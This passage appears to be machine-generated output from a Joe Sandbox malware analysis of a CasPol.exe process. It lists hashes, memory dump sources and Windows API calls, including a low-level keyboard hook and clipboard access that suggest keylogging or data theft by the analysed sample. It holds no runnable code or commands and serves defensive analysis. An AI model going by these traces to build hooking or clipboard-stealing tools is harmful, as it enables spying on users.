                                                                                                                          • Opcode Fuzzy Hash: 209c81e7c297e5d60cdabc1a66dc98a3bdcaa410d1d10c19d53a6bfd2a28736c
                                                                                                                          • Instruction Fuzzy Hash: 8541EFB1D00258AFDB11CF9AC984ADEFBF5BF48314F14802AE819AB354D7749945CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 015104FC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37823196422.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1510000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: 9106fe1b9951352710baac820e987bb64ad089c6333f973b92fe78465eacf188
                                                                                                                          • Instruction ID: b42a47009f997effab7bdbd9bdc6a302fecba9748cb351f07863433e6b7a988d
                                                                                                                          • Opcode Fuzzy Hash: 9106fe1b9951352710baac820e987bb64ad089c6333f973b92fe78465eacf188
                                                                                                                          • Instruction Fuzzy Hash: 223102B0D002899FDB14CF99C584A8EFFF5BF48314F29816AE408AB245D3B59985CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37823196422.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1510000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 4053a2c75f7d9fe24da87f19ed9aeaf71a46a3cfe6e1ff5afb6835152d57b50d
                                                                                                                          • Instruction ID: d51512570a7abf8284bf3a0d6131cc08cfccf55d5fdedea8ccb2f8b20b1cf54c
                                                                                                                          • Opcode Fuzzy Hash: 4053a2c75f7d9fe24da87f19ed9aeaf71a46a3cfe6e1ff5afb6835152d57b50d
                                                                                                                          • Instruction Fuzzy Hash: A631A474A05309DFE706DF68D494A9E7BB2BF89304F15847DE404DB296CB399C85CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 015104FC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37823196422.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1510000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: 544f795e606f5b0760d17b6bb6bf43dc45b5c4ac1c0ffa32d4b1a345fa8b4d33
                                                                                                                          • Instruction ID: 98143ed80f413c4482c222d40992241de0a2af661ca0d54a0bd6a9ed2eb810db
                                                                                                                          • Opcode Fuzzy Hash: 544f795e606f5b0760d17b6bb6bf43dc45b5c4ac1c0ffa32d4b1a345fa8b4d33
                                                                                                                          • Instruction Fuzzy Hash: 773102B0D002899FDB10CF99C584A8EFFF5BF48304F29856AE408AB345D7B59985CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 220874293-0
                                                                                                                          • Opcode ID: 17c9b6210feab4085fc85b7af8e586bfc12ca26bc6642facaacd1c136125c96e
                                                                                                                          • Instruction ID: 441848f19a58f7cb861dcfe6a5d095f2ea5d1bc41786382c12ae2d2f2e638384
                                                                                                                          • Opcode Fuzzy Hash: 17c9b6210feab4085fc85b7af8e586bfc12ca26bc6642facaacd1c136125c96e
                                                                                                                          • Instruction Fuzzy Hash: 633122B0D05248DFDB10CF99D984BCEBBF5AF48308F208069E504BB294D7B46845CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 220874293-0
                                                                                                                          • Opcode ID: 3097515329b03af03ed670c0413a7537d4f014daba3f67a60b00bb61642206aa
                                                                                                                          • Instruction ID: 13d3279eaa70566e4c4637c27ebeea6f7f4f3ebb32d384b0024bd6e7bcbf4076
                                                                                                                          • Opcode Fuzzy Hash: 3097515329b03af03ed670c0413a7537d4f014daba3f67a60b00bb61642206aa
                                                                                                                          • Instruction Fuzzy Hash: 9E3120B0E05248DFDB10CF99D984B8EBBF5AF48308F208069E504BB294D7B4A845CFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000EA4,?,?,01047A40,1E7D60D8,1D7F29F8), ref: 01047AD1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumThreadWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2941952884-0
                                                                                                                          • Opcode ID: c61a512051e10db8031b4b8244171e32edcb37c33b77aef9f846791b38aa5639
                                                                                                                          • Instruction ID: e309490fcb1b917a120b943a3a0af19e9ec0ed6b25c6939579e91988d4d08fed
                                                                                                                          • Opcode Fuzzy Hash: c61a512051e10db8031b4b8244171e32edcb37c33b77aef9f846791b38aa5639
                                                                                                                          • Instruction Fuzzy Hash: 85217CB1D042098FDB14CFAAC844BEEFBF4EF89320F04842AD454A7390C774A944CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000EA4,?,?,01047A40,1E7D60D8,1D7F29F8), ref: 01047AD1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumThreadWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2941952884-0
                                                                                                                          • Opcode ID: 7c4b5965812b72a71507ecc7e13e57dd25a9513e7775b5602a68cad6e6fb2c48
                                                                                                                          • Instruction ID: b3bf12501f8d4d3ab35d99773bfdb0adf291bada0252540e5fa35023e15e80c4
                                                                                                                          • Opcode Fuzzy Hash: 7c4b5965812b72a71507ecc7e13e57dd25a9513e7775b5602a68cad6e6fb2c48
                                                                                                                          • Instruction Fuzzy Hash: 9B2118B1D042498FDB14CFAAC884BEEFBF5EF88320F14842AD454A7650D778A945CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000EA4,?,?,01047A40,1E7D60D8,1D7F29F8), ref: 01047AD1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumThreadWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2941952884-0
                                                                                                                          • Opcode ID: 337abb65366de87205e4deade56f7de188dcf4511501762635028b5e87405ac5
                                                                                                                          • Instruction ID: 83f8cdf74438a171de3f82a6d0e6f4d5bf51efbf2e8e4aed3f68ed59a29a7522
                                                                                                                          • Opcode Fuzzy Hash: 337abb65366de87205e4deade56f7de188dcf4511501762635028b5e87405ac5
                                                                                                                          • Instruction Fuzzy Hash: F7211AB1D042098FDB14CF9AC844BEEFBF5EB88310F14842AD454A7750D778AA44CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 01741633
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824662554.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1740000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HookWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2559412058-0
                                                                                                                          • Opcode ID: a6c6b64361d9897646df6de7a433413b266ea950c87f887401240daff4a2227b
                                                                                                                          • Instruction ID: 6e79d3632ac90bfe9dd8cc1e8e7beeb4b8bc5ef5beca940c54eb8bd8cb99619e
                                                                                                                          • Opcode Fuzzy Hash: a6c6b64361d9897646df6de7a433413b266ea950c87f887401240daff4a2227b
                                                                                                                          • Instruction Fuzzy Hash: 5B2137B1D002089FDB14CF99C944BEEFBF5EF89324F14842AD415A7250C7B4A985CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,01046634,?,?,?), ref: 01047FCD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2030045667-0
                                                                                                                          • Opcode ID: 9789656a942c63ece234d57ef2b1e2a07303154e6cd3e0e064aa1eceb4cffa1f
                                                                                                                          • Instruction ID: edf33d0b72332e1a8531cd04b83cae15fbc851880b9095e1ff341d8a58d4af7d
                                                                                                                          • Opcode Fuzzy Hash: 9789656a942c63ece234d57ef2b1e2a07303154e6cd3e0e064aa1eceb4cffa1f
                                                                                                                          • Instruction Fuzzy Hash: 362104B59002498FDB14CF9AD884ADEFBF5FF88314F10852EE559A7600C375A944CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,01046634,?,?,?), ref: 01047FCD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2030045667-0
                                                                                                                          • Opcode ID: fb6a9250c6f140f140e44998fd75ecf46c8309b429b08b2e55ebb37f2a735b8d
                                                                                                                          • Instruction ID: b8e1efdef400c84248225c6e5a6125ad9c13f47b9c93554d60db3ef61173b7c8
                                                                                                                          • Opcode Fuzzy Hash: fb6a9250c6f140f140e44998fd75ecf46c8309b429b08b2e55ebb37f2a735b8d
                                                                                                                          • Instruction Fuzzy Hash: 762104B59003499FDB10CF9AD884ADEFBF5FF88314F10852EE959A7600C374A944CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindWindowW.USER32(00000000,00000000), ref: 017465C6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824662554.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1740000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FindWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 134000473-0
                                                                                                                          • Opcode ID: cf111dadefbf93e0e4698e0acaa0c7c404d26842776f059d44b5bcd19407ed63
                                                                                                                          • Instruction ID: e355d809ddfbd081336b061cd8b87c6f4ed915631404271e9fbb39c5a3c5b4c4
                                                                                                                          • Opcode Fuzzy Hash: cf111dadefbf93e0e4698e0acaa0c7c404d26842776f059d44b5bcd19407ed63
                                                                                                                          • Instruction Fuzzy Hash: AB2113B5C003498FDB14CFAAD484ADEFBB4BF8A324F14862ED459B7640C375A545CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindWindowW.USER32(00000000,00000000), ref: 017465C6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824662554.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1740000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FindWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 134000473-0
                                                                                                                          • Opcode ID: 8b3f17a1e896eb05d14f7602e77731cf95495b110d77525b6215989d286a493b
                                                                                                                          • Instruction ID: b9e6781522128bb5bdde9159ed0ff43904ac295ad0650a574f40a99a96fd7c93
                                                                                                                          • Opcode Fuzzy Hash: 8b3f17a1e896eb05d14f7602e77731cf95495b110d77525b6215989d286a493b
                                                                                                                          • Instruction Fuzzy Hash: 242113B5D002098FDB14CF9AD484A9EFBB4FF4A310F10852EE519B7604D774A544CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,017499B9,00000800), ref: 01749A4A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824662554.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1740000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: d3a7fe2518dec5c0ce29634f81b7b73a8eb77110d353090b758863bcda0d8801
                                                                                                                          • Instruction ID: 117668c586b048eab41d8f60522818a755a3bbbc6568d9cfff483247f5b56ca7
                                                                                                                          • Opcode Fuzzy Hash: d3a7fe2518dec5c0ce29634f81b7b73a8eb77110d353090b758863bcda0d8801
                                                                                                                          • Instruction Fuzzy Hash: F12106B5D002499FDB10CF9AD444BDEFBF4AB89324F10842ED519B7600C3B9AA45CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0151ED02), ref: 0151EDEF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37823196422.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1510000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1890195054-0
                                                                                                                          • Opcode ID: 4c11832cf88b1c0ed43cc155100031975dc6da065411a9f24fa81a61a282295a
                                                                                                                          • Instruction ID: ea5a6367054f0b22cfadd8bf4d656f3c25e0480fa12aff32da8f38124c6d58ab
                                                                                                                          • Opcode Fuzzy Hash: 4c11832cf88b1c0ed43cc155100031975dc6da065411a9f24fa81a61a282295a
                                                                                                                          • Instruction Fuzzy Hash: 581122B1C046599BDB10CFAAC44879EFBF4FF48224F01852AD914AB240D378A954CBE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0174E40A,00000000,00000000,1E7D60D8,1D7F29F8), ref: 0174E858
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824662554.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1740000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePeek
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2222842502-0
                                                                                                                          • Opcode ID: 89709fb7e6f286a3b79b7fc1e233c91da53b9453573284d66935585f3a091dc1
                                                                                                                          • Instruction ID: a0f2c8bcd2b330fd43849958e046d0cd38a15f71dd288ba415b40a9680425d5c
                                                                                                                          • Opcode Fuzzy Hash: 89709fb7e6f286a3b79b7fc1e233c91da53b9453573284d66935585f3a091dc1
                                                                                                                          • Instruction Fuzzy Hash: 4C1129B1C042499FDB10CF9AD484BDEFBF8FB48320F00842AE558A7241C778A944CFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,017499B9,00000800), ref: 01749A4A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824662554.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1740000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 096d00a6e08df2b1baaf8922a855e278d70fbbc6aeeb524de5738c52d7f1a7d3
                                                                                                                          • Instruction ID: 263244d43acd7dda3b62b53369175ef92efc8e5da4b92934ee95f165dc950506
                                                                                                                          • Opcode Fuzzy Hash: 096d00a6e08df2b1baaf8922a855e278d70fbbc6aeeb524de5738c52d7f1a7d3
                                                                                                                          • Instruction Fuzzy Hash: B61103B5D042499FDB10CF9AD444ADFFBF4EB89314F00842AE519A7600C3B4AA44CFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0174E40A,00000000,00000000,1E7D60D8,1D7F29F8), ref: 0174E858
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824662554.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1740000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePeek
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2222842502-0
                                                                                                                          • Opcode ID: d84b09f095844909f3bf7e395471fcbd53b93b67e203afe180da6d2abc0cd8a0
                                                                                                                          • Instruction ID: c6370507be3e9e5129b8f02a7f752d1adeb77f183f60686ec849b90ec64c1d0f
                                                                                                                          • Opcode Fuzzy Hash: d84b09f095844909f3bf7e395471fcbd53b93b67e203afe180da6d2abc0cd8a0
                                                                                                                          • Instruction Fuzzy Hash: 542114B1C002499FDB10CF9AC584BDEFBF8FB49320F00842AE558A7251C7B8A645CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1F9B53B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37852102301.000000001F9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1f9b0000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4139908857-0
                                                                                                                          • Opcode ID: 4c097c5108e824a0cd44030cd7e24e39e97d64591ed04e982a788bfb440f3a95
                                                                                                                          • Instruction ID: b94b296a2e419b005fbb1b212437cf6afde67f970145605fc907ab7a1ff3687f
                                                                                                                          • Opcode Fuzzy Hash: 4c097c5108e824a0cd44030cd7e24e39e97d64591ed04e982a788bfb440f3a95
                                                                                                                          • Instruction Fuzzy Hash: 2111EFB5D007498BCB10DF9AD444A9EFBF4AB89224F10842ED429B7744D3B9A545CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,010489DF), ref: 01048A7F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2492992576-0
                                                                                                                          • Opcode ID: 8bc5144e208af5fe984ef67467497cd676213219367c92e01206eb8a6c267e0a
                                                                                                                          • Instruction ID: 0ed0cfc1829fd7e5aa08a8703b08c6a9cb62fbc0516592b3ec15aa28424ad3e4
                                                                                                                          • Opcode Fuzzy Hash: 8bc5144e208af5fe984ef67467497cd676213219367c92e01206eb8a6c267e0a
                                                                                                                          • Instruction Fuzzy Hash: B61125B19042488FDB10CFAAD4887DEFBF4EF89324F24881AD518A7650C7B4A944CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,010489DF), ref: 01048A7F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2492992576-0
                                                                                                                          • Opcode ID: a5e2c743385015bcfdb06c1b9bf572d362f64737063a7d3fa9465c1fcb9c8a0d
                                                                                                                          • Instruction ID: a30b328e37189d3b258b0157a6c3dd0a4ea317007d333ab8d7915606270412d0
                                                                                                                          • Opcode Fuzzy Hash: a5e2c743385015bcfdb06c1b9bf572d362f64737063a7d3fa9465c1fcb9c8a0d
                                                                                                                          • Instruction Fuzzy Hash: 901125B09042498FDB10DF9AC48879EFBF4EF49324F14886AD559B7350D7B8A944CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1F9B53B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37852102301.000000001F9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1f9b0000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4139908857-0
                                                                                                                          • Opcode ID: 12ecf4efb1040f1d518681d9c03136049d2543a98bcf5e9401b17e88c5228803
                                                                                                                          • Instruction ID: f629b5997aa1777782745809143a152afa81989b8fab25d43bbd574aca863455
                                                                                                                          • Opcode Fuzzy Hash: 12ecf4efb1040f1d518681d9c03136049d2543a98bcf5e9401b17e88c5228803
                                                                                                                          • Instruction Fuzzy Hash: 8C11FDB6D003498ECB10DFAAD444ADEFBF4AF89224F14841ED429A7644D3B9A645CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 01047585
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2538663250-0
                                                                                                                          • Opcode ID: 0ba696838f87467219688847e07d01bc1548aba052dc35ab20bce7e479cc6d54
                                                                                                                          • Instruction ID: 3b518910b5540102abd938deb62f9dfbeddf055b12c426a7ad73af49a66489c0
                                                                                                                          • Opcode Fuzzy Hash: 0ba696838f87467219688847e07d01bc1548aba052dc35ab20bce7e479cc6d54
                                                                                                                          • Instruction Fuzzy Hash: 021115B09043888FDB10CF9AD488B9EBBF4EB49324F10885AD558AB610D3B4A944CFE5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0174E54F), ref: 0174F705
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824662554.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1740000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DispatchMessage
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2061451462-0
                                                                                                                          • Opcode ID: f278dcec1b1c290d6e81b5ec9e2660f08e53268db91337363d17a3276cd19d74
                                                                                                                          • Instruction ID: 2fda93a0e8057fe3d76a18f17caa9b985119f6ea0d57d8449a6268697a140857
                                                                                                                          • Opcode Fuzzy Hash: f278dcec1b1c290d6e81b5ec9e2660f08e53268db91337363d17a3276cd19d74
                                                                                                                          • Instruction Fuzzy Hash: 3E11FEB4D046488FCB10CFAAD848B9EFBF4EF49324F10846AE518B7610D3B8A544CFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0174E54F), ref: 0174F705
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824662554.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1740000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DispatchMessage
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2061451462-0
                                                                                                                          • Opcode ID: 1ed79ef0109c4fb73d59e384cc229ac0764217bd2d006cc61ac183e8c6fd40cd
                                                                                                                          • Instruction ID: 292c279c71d697e067f309c27a2013bb44ad2ec537c3f6b6dcfb33387efd15b1
                                                                                                                          • Opcode Fuzzy Hash: 1ed79ef0109c4fb73d59e384cc229ac0764217bd2d006cc61ac183e8c6fd40cd
                                                                                                                          • Instruction Fuzzy Hash: 4111F2B4D046498FDB10CF9AD548BCEFBF4EF49324F10841AD519AB650C3B8A645CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 01047585
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2538663250-0
